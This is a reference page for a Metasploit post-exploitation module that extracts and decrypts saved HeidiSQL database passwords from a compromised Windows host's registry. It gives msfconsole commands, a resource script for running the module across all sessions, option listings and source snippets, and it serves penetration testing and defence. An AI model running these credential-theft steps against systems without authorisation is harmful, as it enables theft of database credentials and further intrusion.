Windows Gather HeidiSQL Saved Password Extraction - Metasploit


This page contains detailed information about how to use the post/windows/gather/credentials/heidisql metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Windows Gather HeidiSQL Saved Password Extraction
Module: post/windows/gather/credentials/heidisql
Source code: modules/post/windows/gather/credentials/heidisql.rb
Disclosure date: -
Last modification time: 2020-09-22 02:56:51 +0000
Supported architecture(s): -
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: -

This module extracts saved passwords from the HeidiSQL client. These passwords are stored in the registry. They are encrypted with a custom algorithm. This module extracts and decrypts these passwords.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


There are two ways to execute this post module.

From the Meterpreter prompt

The first is by using the "run" command at the Meterpreter prompt. It allows you to run the post module against that specific session:

meterpreter > run post/windows/gather/credentials/heidisql

From the msf prompt

The second is by using the "use" command at the msf prompt. You will have to figure out which session ID to set manually. To list all session IDs, you can use the "sessions" command.

msf > use post/windows/gather/credentials/heidisql
msf post(heidisql) > show options
    ... show and set options ...
msf post(heidisql) > set SESSION session-id
msf post(heidisql) > exploit

If you wish to run the post against all sessions from framework, here is how:

1 - Create the following resource script:


framework.sessions.each_pair do |sid, session|
  run_single("use post/windows/gather/credentials/heidisql")
  run_single("set SESSION #{sid}")
  run_single("run")
end

2 - At the msf prompt, execute the above resource script:

msf > resource path-to-resource-script

Required Options


  • SESSION: The session to run this module on.

Go back to menu.

Msfconsole Usage


Here is how the windows/gather/credentials/heidisql post exploitation module looks in the msfconsole:

msf6 > use post/windows/gather/credentials/heidisql

msf6 post(windows/gather/credentials/heidisql) > show info

       Name: Windows Gather HeidiSQL Saved Password Extraction
     Module: post/windows/gather/credentials/heidisql
   Platform: Windows
       Arch: 
       Rank: Normal

Provided by:
  h0ng10

Compatible session types:
  Meterpreter

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  SESSION                   yes       The session to run this module on.

Description:
  This module extracts saved passwords from the HeidiSQL client. These 
  passwords are stored in the registry. They are encrypted with a 
  custom algorithm. This module extracts and decrypts these passwords.

Module Options


This is a complete list of options available in the windows/gather/credentials/heidisql post exploitation module:

msf6 post(windows/gather/credentials/heidisql) > show options

Module options (post/windows/gather/credentials/heidisql):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SESSION                   yes       The session to run this module on.

Advanced Options


Here is a complete list of advanced options supported by the windows/gather/credentials/heidisql post exploitation module:

msf6 post(windows/gather/credentials/heidisql) > show advanced

Module advanced options (post/windows/gather/credentials/heidisql):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Post Actions


This is a list of all post exploitation actions which the windows/gather/credentials/heidisql module can do:

msf6 post(windows/gather/credentials/heidisql) > show actions

Post actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the windows/gather/credentials/heidisql post exploitation module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 post(windows/gather/credentials/heidisql) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

HeidiSQL not installed for this user.


Here is a relevant code snippet related to the "HeidiSQL not installed for this user." error message:

42:	        next if hive['HKU'].nil?
43:	        print_status("Looking at Key #{hive['HKU']}")
44:	        begin
45:	          subkeys = registry_enumkeys("#{hive['HKU']}\\Software\\HeidiSQL\\Servers")
46:	          if subkeys.blank?
47:	            print_status("HeidiSQL not installed for this user.")
48:	            next
49:	          end
50:	
51:	          service_types = { 0 => 'mysql',
52:	                            1 => 'mysql-named-pipe',

Cannot Access User SID: <HKU> : <E.MESSAGE>


Here is a relevant code snippet related to the "Cannot Access User SID: <HKU> : <E.MESSAGE>" error message:

151:	
152:	          end
153:	        end
154:	      rescue ::Rex::Post::Meterpreter::RequestError => e
155:	        elog(e)
156:	        print_error("Cannot Access User SID: #{hive['HKU']} : #{e.message}")
157:	      end
158:	    end
159:	    unload_our_hives(userhives)
160:	  end
161:	

Go back to menu.


Go back to menu.

See Also


Check also the following modules related to this module:

Authors


  • h0ng10

Version


This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.